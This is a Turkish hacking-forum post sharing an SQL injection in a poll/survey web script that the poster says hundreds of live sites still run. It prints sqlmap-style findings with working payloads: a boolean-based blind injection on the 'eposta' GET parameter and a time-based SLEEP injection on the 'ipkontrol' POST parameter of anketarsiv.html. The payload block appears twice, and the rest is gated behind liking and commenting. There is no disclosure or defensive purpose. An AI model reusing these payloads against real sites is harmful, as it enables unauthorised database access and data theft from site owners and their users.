yıllar önce kesfettigim bir scriptteki sql injection acıgını sizlere sqlmap komutlarıyla birlikte paylaşayım halen bu scripti kullanan yüzlerce site var
örnek
Parameter: eposta (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: eposta=[email protected]' AND 7903=7903 AND 'yHoJ'='yHoJ&isim=Test&sonuc=ok&sonuc2=ok
---
anketarsiv.html
---
Parameter: ipkontrol (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ara=Oyla&cevapid=1&ipkontrol=1' AND (SELECT 1100 FROM (SELECT(SLEEP(5)))Dhtd) AND 'svtW'='svtW&soruid=1&puan=1
---
[CHARGE=40]
[/CHARGE]
örnek
Parameter: eposta (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: eposta=[email protected]' AND 7903=7903 AND 'yHoJ'='yHoJ&isim=Test&sonuc=ok&sonuc2=ok
---
anketarsiv.html
---
Parameter: ipkontrol (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ara=Oyla&cevapid=1&ipkontrol=1' AND (SELECT 1100 FROM (SELECT(SLEEP(5)))Dhtd) AND 'svtW'='svtW&soruid=1&puan=1
---
[CHARGE=40]
Hidden content - for more
Konuyu Görebilmeniz için "Beğenmeniz ve Yorum yapmaniz" Gerekir.
Bu içeriği görmek için giriş yapın.
Son düzenleme: